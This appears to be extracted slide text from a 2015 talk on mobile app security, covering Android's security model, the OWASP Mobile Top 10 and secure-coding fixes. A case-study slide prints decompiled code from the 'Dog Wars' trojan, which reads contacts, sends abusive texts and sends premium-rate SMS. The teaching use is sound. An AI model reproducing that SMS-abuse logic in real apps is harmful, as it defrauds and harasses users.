ISACA – Mobile Computing

Welcomewelcome to my presentation

ISACA – Leeds – 18th November 2015

Please save all questions until the end of the presentation

Let`s start!

1

2

3

4

About meWho am I?

Introduction to MobileWhy mobile

Mobile Security ChallengesFrom a business point-of-view

OWASPMobile Security Project

5

6

7

Common VulnerabilitiesReal examples, including Malware

FixesDevelop secure code

The future of mobileWhere I see the future going

End of presentationThank you for your attention

About meShort info what I do

AboutMeWho am I?

Andrew PannellAndrew/Andy/Andi

Ethical Hacking for Computer Security BSc25,000 word dissertation mobile [in]security

OWASP Mobile Security ProjectMember, Contributor, Android SME

Penetration TesterWorking for Pentest Limited. Based in London office

CREST ICS Technical AssuranceIndustrial Control Systems/SCADA

www.pentest.co.uk

AboutUsWho are Pentest?

Pentest Limited

Established in 2001

CREST Member company

Application security specialists

Research

www.pentest.co.uk

(Council Registered Ethical Security Testers)

AboutYouWho are my audience?

Developers?

Security Professionals?

Apple?

Techies?

Android?

www.pentest.co.uk

Intro to MobileWhy mobile?

PhonesTimelineHow phones have developed

1999 Blackberry 850

First device released under the Blackberry brand

1997Nokia 6110

Three games, calculator, works as pager

1875 – A.G. Bell invents telephone

www.pentest.co.uk

PhonesTimelineHow phones have developed

2000Nokia 3310

The one your mates had at school. Indestructible

2001 Symbian S80

Nokia’s OS. Runs Java files.

2004First mobile virus “Cabir”

Spread via Bluetooth, harmless shows “cabre”

www.pentest.co.uk

PhonesTimelineHow phones have developed

2006 Symbian S60 & Nokia N95

Mandatory code signing

2008Apple iPhone and Android

Launch of smartphones with ability to purchase apps

Present

www.pentest.co.uk

MobileIntroductionBig money in mobile

$77 billionper year

100 apps installed

75% fail basic

security

56 million items of data

Revenue of mobile applications worldwide

Average number of applications installed

per user mobile device

According to Garner even basic

security fails to implemented on

mobile apps

Unencrypted, unsecured, unprotected

private user data

MobileStatistics

www.pentest.co.uk

MobileSecurityOn average 9 vulnerabilities per application

28% 34% 25% 13%

No direct threat, more a

risk and does not cause

damage by itself. But may

be leveraged with other

vulnerabilities to launch

further attacks.

LowImposes some

affect/damage to the

application. Can assist an

attack to launch further

attacks.

MediumPotential to directly

compromise CIA,

likelihood is not high.

Possible damage is high

but not a total disaster.

HighMajor security risk, with

direct exploit. Ability to

cause major damage to

the application/company.

Likelihood is high.

Critical

www.pentest.co.uk

Source:https://www.checkmarx.com/2015/11/05/the-state-of-mobile-app-security/

AndroidIntroductionWhy Android?

1.5 million daily activations with over 1 billion active users

Over 4000 Android devices

83% of worldwide market share

www.pentest.co.uk

AndroidIntroductionMore about Android

Part compiled apps

Internal Storage and SD card

SQLite database

Activities/Intents/Services/Broadcasts/Content providers

Overview

www.pentest.co.uk

AndroidSecurityAndroid Security Model

Sandboxing

The Android Application Sandbox, which isolates your app data and code execution from other apps..

Permissions model

User-granted permissions to restrict access to system features and user data.

Application-defined permissions to control application data on a per-app basis.

Application Isolation

www.pentest.co.uk

AndroidSecurityAndroid Security Model

Sandboxing

www.pentest.co.uk

AndroidSecurityAndroid Security Model

Permissions

www.pentest.co.uk

ChallengesTo mobile security

BusinessChallengesDifficulties with mobile

The emergence of mobile as new tech, means the use of new developers. Straight out of university

making the same old web security mistakes.

Rush to market, to get there first before competitors.

BYOD means that hostile mobile devices are now connecting to the enterprise environment.

“Mobile Devices tend to be misplaced, lost or even stolen”

www.pentest.co.uk

BusinessChallengesNews

www.pentest.co.uk

BusinessChallengesNews

www.pentest.co.uk

BusinessChallengesNews

www.pentest.co.uk

BusinessChallengesNews

www.pentest.co.uk

BusinessChallengesNews

www.pentest.co.uk

OWASPMobile Security Project

OWASPMobileOpen Web Application Security Project

The OWASP Mobile Security Project is a centralized resource intended to give developers and security

teams the resources they need to build and maintain secure mobile applications. Through the project,

our goal is to classify mobile security risks and provide developmental controls to reduce their impact

or likelihood of exploitation.

Our primary focus is at the application layer. While we take into consideration the underlying mobile

platform and carrier inherent risks when threat modelling and building controls, we are targeting the

areas that the average developer can make a difference. Additionally, we focus not only on the mobile

applications deployed to end user devices, but also on the broader server-side infrastructure which the

mobile apps communicate with. We focus heavily on the integration between the mobile application,

remote authentication services, and cloud platform-specific features.

Source: https://www.owasp.org/index.php/OWASP_Mobile_Security_Project

www.pentest.co.uk

OWASPMobile Top 10 2015 (DRAFT)

InsecureAuthorisation

Client CodeQuality Issues

Code Tampering

ReverseEngineering

ExtraneousFunctionality

www.pentest.co.uk

ImproperPlatformUsage

InsecureData

Storage

InsecureCommunications

InsecureAuthentication

InsufficientCrypto

Note: these are in no particular order

OWASPMobileMobile Top Ten 2015 (BETA)

Improper Platform Usage

Violation of development guidelines for security

Unintentional misuse

www.pentest.co.uk

OWASPMobileMobile Top Ten 2015 (BETA)

Insecure Data Storage

Including unintended data leakage

SQL databases, log files, XML manifest, SD card, cookies, the cloud

Internal processes, caches

Analytics

www.pentest.co.uk

Leaving user data unprotected in your app, may allow malicious applications to access it

OWASPMobileMobile Top Ten 2015 (BETA)

Insecure Communications

Weak SSL versions and ciphers

Weak handshake

Clear text communications

Man-in-the-middle

www.pentest.co.uk

Jeopardises the confidentiality of data between your app and the endpoint via MiTM attacks

OWASPMobileMobile Top Ten 2015 (BETA)

Insecure Authentication

Bad/weak session management

Predictive identifiers

Session fixation

Failing to log out properly (e.g. only client-side)

www.pentest.co.uk

Failing to identify a user at all

Risk of exposing data to unidentified users (e.g. anonymous users), invoking web services

OWASPMobileMobile Top Ten 2015 (BETA)

Insufficient Cryptography

Relates to crypto attempted, but poorly

Poor key selection (lack of randomness)

Roll your own crypto?!

www.pentest.co.uk

User data is likely to be exposed, offline brute force, replay attacks

OWASPMobileMobile Top Ten 2015 (BETA)

Insecure Authorisation

Client based authorisation decisions

Permission when logged in

www.pentest.co.uk

Granting access to unauthorised users, invoking services or receive services

OWASPMobileMobile Top Ten 2015 (BETA)

Client Code Quality

Ensure secure coding practices during life cycle

Code level implementation problems on mobile client

Buffer overflow, format string vulnerabilities

www.pentest.co.uk

Exploiting business logic

OWASPMobileMobile Top Ten 2015 (BETA)

Code Tampering

Binary patching

Changes to the application package

Malware

www.pentest.co.uk

Subvert/short-circuit licensing, clone the application for malicious purposes

OWASPMobileMobile Top Ten 2015 (BETA)

Reverse Engineering

Not always a problem (open source)

Can reveal hidden methods and functionality

May lead to code tampering

Bypass logic

www.pentest.co.uk

Bypass security controls and business logic, facilitating other attacks. Business risk, loss of revenue, brand damage, phishing

OWASPMobileMobile Top Ten 2015 (BETA)

Extraneous functionality

Backdoor functionality

Development code left in

www.pentest.co.uk

Exposing extra functionality left in for development

Common VulnsReal life examples

CaseStudyDog O War

Sent texts to contacts

Sent premium rate messages

PETA distanced themselves

Read contacts

Modified Legitimate AppDog War by KAGA Games

MalwareReleased in August 2011

Mobile Malware

CaseStudyDog Wars – Android Manifest

www.pentest.co.uk

<manifest package="kagegames.apps.DWBeta"><uses-permission android:name="android.permission.VIBRATE"/><uses-permission android:name="android.permission.INTERNET"/><uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/><uses-permission android:name="android.permission.READ_PHONE_STATE"/><uses-permission android:name="android.permission.SEND_SMS"/><uses-permission android:name="android.permission.WRITE_SMS"/><uses-permission android:name="android.permission.READ_CONTACTS"/><uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/><meta-data android:name="ADMOB_PUBLISHER_ID" android:value=“NOTKAGAEGAMES"/>

CaseStudyDog Wars – Code

www.pentest.co.uk

package com.dogbite;

public class Rabies

public void onStart(Intent paramIntent, int paramInt) { super.onStart(paramIntent, paramInt); paramIntent = getContentResolver().query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null); SmsManager localSmsManager = SmsManager.getDefault(); if (paramIntent.getCount() > 0) {}

CaseStudyDog Wars – Code

www.pentest.co.uk

if (!((Cursor)localObject).moveToNext()) { localSmsManager.sendTextMessage("73822", null, "text", null, null); break; }

localSmsManager.sendTextMessage(((Cursor)localObject).getString(((Cursor)localObject).getColumnIndex("data1")), null, "I take pleasure in hurting small animals, just thought you should know that", null, null);

CodeExampleStreaming App – 1 variable protection

www.pentest.co.uk

package com.store.app.module.util;import android.view.Window;import com.store.app.util.ScreenshotRestriction;import com.store.app.util.Restrictionpublic class RestrictionsModule{ public static Restriction<Window> screenshotRestrictions() { return new ScreenshotRestriction(true); }}

FixesDevelop secure code

DeveloperFixesHow to code securely

Code tampering

Prevent reverse engineering by obfuscating code. Check apk matches to prevent allowing modified code to be ran. 1Insecure data storage

Encrypt application data files. Do not store on sdcard (if possible). Be careful of choice of analytics. 2Insecure authorisation and authentication

Assume device is hostile, validate on server-side. 3www.pentest.co.uk

DeveloperFixesHow to code securely

Rooted devices

Can you allow a rooted device to run your application? If so, consider presenting a warning to the user regarding the security of their data. 4

www.pentest.co.uk

The futureWhat I see anyway

MobileFutureAndroid Wear

Android Wear - Works

in conjunction with

mobile device.

Notifications,

interactions, fitness

and health.

www.pentest.co.uk

MobileFutureAndroid TV

Android TV – Smart TV,

Android UI, voice

commands, screen

casting, internet

connected

www.pentest.co.uk

MobileFutureAndroid Auto

Android Auto extends

functionality of the

phone to the car, client-

server with phone,

pulls information from

sensors

www.pentest.co.uk

ContactMy contact details

www.pentest.co.uk

ContactInfo

Any questions? Comments?

ThankYou

andrew.pannell@pentest.co.uk

www.pentest.co.uk

+44 (0)7530 668 399